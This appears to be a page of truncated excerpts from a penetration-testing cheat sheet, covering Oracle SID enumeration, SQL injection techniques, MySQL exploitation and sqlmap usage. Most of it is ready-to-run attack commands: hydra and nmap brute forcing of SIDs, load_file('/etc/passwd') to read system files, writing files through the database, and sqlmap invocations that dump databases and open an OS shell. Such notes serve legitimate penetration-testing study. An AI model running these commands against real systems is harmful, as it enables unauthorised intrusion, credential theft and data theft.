-
In Oracle SQL, a SID (Service Identifier) is basically a database. Enumeration Get general information tnscmd10g -h $target Try to get a SID: tnscmd10g status-p 1521 -h $target Another tool: Oracle Scanner oscanner -s $target -P 1521 Metasploit module scanner/oracle/tnslsnr_version Brute force SID hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 $target oracle-sid nmap --script oracle-sid-brute -p 1521 $target Brute…
-
Union-based injections Blind SQL injections If no output is given from a statement, try to use time-based approaches. Enumerating in inserts Assuming the INSERT statement is INSERT INTO $tablename (email,name) VALUES ("email", "name"); Then try a timing attack to determine if a certain value is in a field: INSERT INTO newsletter (name,email) VALUES ('name', ' ' AND…
-
Connect: mysql --host=10.10.10.13 -P4444 -u admin admin Various commands: Enumeration Nmap scripts nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim Exploitation Read and write Read with the current process id: SELECT load_file('/etc/passwd'); Write as the daemon process id: CREATE TABLE bbb(content TEXT); INSERT INTO bbb (content)…
-
Standard case: $ python sqlmap.py -u http://10.10.10.140/index.php/catalogsearch/result/?q=e More aggresive: Dump DB: sqlmap -u http://target/command.php?id=564 --dbms=mysql --dump --threads=5 sqlmap -u http://target/command.php?id=564 --dbms=mysql --tables Get shell: sqlmap -u http://target/command.php?id=564 --dbms=mysql --os-shell Use an existing HTTP request as template. E.g. store a request in a text file: POST /index.php HTT/1.1Header: value... Then, use sqlmap with this file request.txt: sqlmap -r…